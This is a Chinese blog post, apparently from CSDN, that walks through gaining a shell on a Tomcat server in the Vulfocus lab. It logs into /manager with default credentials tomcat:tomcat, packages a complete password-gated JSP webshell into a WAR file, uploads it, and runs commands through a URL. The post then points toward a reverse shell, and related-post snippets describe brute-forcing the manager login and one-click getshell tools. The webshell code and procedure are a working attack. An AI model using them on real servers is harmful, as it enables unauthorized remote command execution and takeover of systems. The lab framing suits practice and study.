Tomcat 后台文件上传一键getshll

最新推荐文章于 2024-08-06 10:13:47 发布
最新推荐文章于 2024-08-06 10:13:47 发布
阅读量2k 收藏 1
点赞数 1
分类专栏: cve复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64815693/article/details/128872798
版权
文章讲述了通过Vulfocus平台模拟环境,利用常见的后台弱口令(如tomcat:tomcat)登录并上传包含jsp木马的war文件到/manager路径。使用可以回显的jsp代码打包成war,上传后通过访问特定URL执行命令,展示了如何进行权限提升和反弹shell的操作。
摘要由CSDN通过智能技术生成

概述

我们可以后台弱口令上传war文件,然后一键getshell。

环境搭建

这个Vulfocus中有在线漏洞,这里我们就通过这个来搞,没有注册的记得先注册一下。

漏洞地址

漏洞分析

这里我们来到后台,后台网址通常都是/manager,常用弱口令tomcat:tomcat

这里我们可以看到有一个可以上传东西的地方,这里需要上传一个war文件。

这里我们使用一个可以回显的jsp木马,使用命令jar -cvf 1.war 1.jsp 打包起来

<%
    if("123".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("<pre>");
        while((a=in.read(b))!=-1){
            out.println(new String(b));
        }
        out.print("</pre>");
    }
%>

这里我们将aaa.war上传上去,这里我们可以访问

靶机ip/war名称/木马完整文件名

http://123.58.224.8:55780/aaa/1.jsp

这里查看是可以执行命令的,我们可以反弹shell来进一步操作。

如何在Tomcat后台通过文件上传getshell总结(个人学习笔记思路)
m0_58792545的博客
07-27 2435
关于文件上传getshell的一些思路以及细节总结
漏洞复现之Tomcat后台War包上传Getshell
Blood_Pupil的博客
03-19 7201
注意标题,后台War包上传Getshell!这种方法的利用上下文是你已经能够登录Tomcat的管理后台,注意是Tomcat的管理后台而不是Web应用程序的后台!本文章一切演示以vuln提供的漏洞环境为例 Tomcat后台 使用本文所描述的技能的前提是先进入Tomcat的管理后台,那么Tomcat管理后台的URI你知道吗?有哪些限制阻止你登录后台,你知道吗?正所谓知己知彼百战不殆,那不如我们首先...
Tomcat弱口令后台部署war包getshell
qq_59102311的博客
04-24 2446
3.点击Manager App,跳转http://127.0.0.1:8080/manager/html,要求登录验证。6.使用auxiliary/scanner/http/tomcat_mgr_login模块,查看详细信息。1.进入/vulhub/tomcat/tomcat8目录,启动docker。8.运行模块,爆破得出用户名和密码:tomcat:tomcat。13. 打开蚁剑,输入url,密码cmd,成功getshell。11.使用cmd命令,将jsp文件打包成war包。7.设置目标IP和目标端口。
【 漏洞复现 】Tomcat 后台弱口令部署war包 getshell
最新发布
qq_48368964的博客
08-06 451
tomcat8环境下默认进入后台的密码为 tomcat/tomcat,未修改造成未授权即可进入后台,或者管理员把密码设置成弱口令。
上传war包到服务器(tomcatwebapps目录下)
热门推荐
catface
09-06 1万+
上传war包到服务器(tomcatwebapps目录下)
Tomcat 中是怎么处理文件上传的?
LeZiJie的博客
04-30 911
Tomcat 中是怎么处理文件上传的? 先点赞再看,养成好习惯 前言 这两天在另一个社区看到了一个关于 Tomcat 的提问,还挺有意思。正好自己之前也没思考过这个问题,今天就结合 Tomcat 机制来聊聊这个“为什么”。 本文对 HTTP 协议中的文件上传标准和 Tomcat 机制的分析内容较多,比较基础,不需要的大佬门可以直接跳到文末。 HTTP 协议中的文件上传 众所周知,HTTP 是一个文本协议,那文本协议如何传输文件呢? 直接传……是的就这么简单。文本协议只是在应...
阿里云搭建tomcat/php环境一键安装包(含安装教程).zip
09-05
阿里云搭建tomcat/php 环境一键安装包,此安装包可在阿里云所有Linux系统上部署安装。请使用最新的一键安装包脚本安装,以前老版本都存在bug,会导致安装异常以及安装的环境混乱。执行一键安装包(./install.sh),会...
JavaWeb+Tomcat+mysql一键部署安装相关文件
01-05
首先,"JavaWeb+Tomcat+mysql一键部署安装相关文件"这个标题表明我们将讨论的是一个简化了安装过程的集成方案,使得开发者或运维人员能够快速地在服务器上搭建一个完整的JavaWeb应用环境。这通常涉及到以下几个关键...
阿里云搭建tomcat/php 环境一键安装包
10-22
阿里云搭建Tomcat和PHP环境一键安装包是一个高效便捷的方法,尤其适合那些对Linux系统管理经验有限但需要快速部署Web服务的用户。这个安装包整合了Tomcat(一个流行的Java应用服务器)和PHP(一种广泛使用的服务器端...
JDK+Eclipse+tomcat+maven(一键安装)
07-10
网上各种安装方法太烦,这次电脑连续被重装,不得不装这些工具N次,...(备注:以上安装文件除了jdk1.7是我以前不知从哪下载的,其他工具的安装文件都是官网下载的,安装教程中有详细的下载网址及方法,在此不再上传)
tomcat服务器的文件上传功能实现
天真吖的博客
12-03 1946
目录一、场景:展示向服务器添加商品,商品信息包括图片,以及其他信息1,获取数据2.添加数据3.传回数据到前台二、附:配置CATALINA_HOME三、效果展示 1,获取数据 2.添加数据 3.传回数据到前台 略 按‘i’进入insert模式,在最后加入 如:/usr/local/tomcat/apache-tomcat-9.0.68按ESC退出insert模式,按‘:wq’,保存退出使配置生效 新建一个在webapps下新建upload文件夹可以看到:pid为3的这条数据
tomcat 实现文件上传下载
04-01
实现文件的上传和下载的源代码 决定没问题的。 利用了struts2 tomcat
dz7.2一键getshell
07-22
dz7.2一键getshell,python脚本,亲测成功
s2_061一键getshell工具
12-18
s2_061一键getshell工具
Tomcat后台上传war包getshell复现
一瓶草莓酱的博客
03-17 3858
环境搭建 页面浏览: 漏洞简介 tomcat是apache软件基金会的核心项目,tomcat服务器是一个免费的开放源代码的web应用服务器,属于轻量级应用服务器。默认端口:8080 tomcat是一个中间件,在B/S架构中,浏览器发出的http请求经过tpmcat中间件,转发到最终的目的服务器上,响应消息再通过tomcat返回给浏览器。 tomcat存在管理后台进行应用部署管理,且管理后台使用HTTP基础认证进行登录。若用户口令为弱口令,攻击者容易进行暴力破解登录后台并进行应用管理。 图中可以看到ma
Tomcat WAR包部署getshell
aqi_sec的博客
07-06 2292
Tomcat WAR包部署getshell
Tomcat页面弱口令war包上传Getshell
来到了学渣的博客
07-19 3087
思路 burpsuit对tomcat进行弱口令爆破→利用弱口令进入tomcat管理页面→制作war包上传getshell 在vulhub路径/vulhub/tomcat/tomcat8中启动tomcat环境 Tomcat默认页面登录管理在manager/html路径下 启动burpsuit抓包进行弱口令爆破 对Basic后面那一段base64进行解码发现是这样的一个格式 账号:密码 发送至爆破处 然后再选择encode编码 阿里云搭建漏洞环境跑爆破居然会ban掉自己ip。。。只能从虚拟机来
Tomcat弱口令进入后台部署war包getshell
weixin_50053818的博客
06-30 1159
文章目录环境docker+vuhub搭建环境爆破进入后台上传war包getshell 环境 vulhub docker-compose kali docker+vuhub搭建环境 通过git将vulhub仓库克隆到本地中。 ``` git clone https://github.com/vulhub/vulhub ``` 进入vulhub目录下的tomcat目录即可。 执行docker-compose up -d即可完成tomcat的搭建。 爆破进入后台 直接访问ip:port即可进入tomca
phpcms9-6-0 一键getshell工具
ai74583的博客
04-10 1055
介绍 一键化python 1.py http://xxx.com,如果是批量直接运行py文件即可 待办 [] 加入对有验证码phpcms网站的支持 [] 加入批量(已完成) 说明 依赖库的安装pip install requests 代码 # -*- coding:utf-8 -*- ''' ---------------------- Author : Akkuman Bl...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

练习两年半的篮球选..哦不对安全选手

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值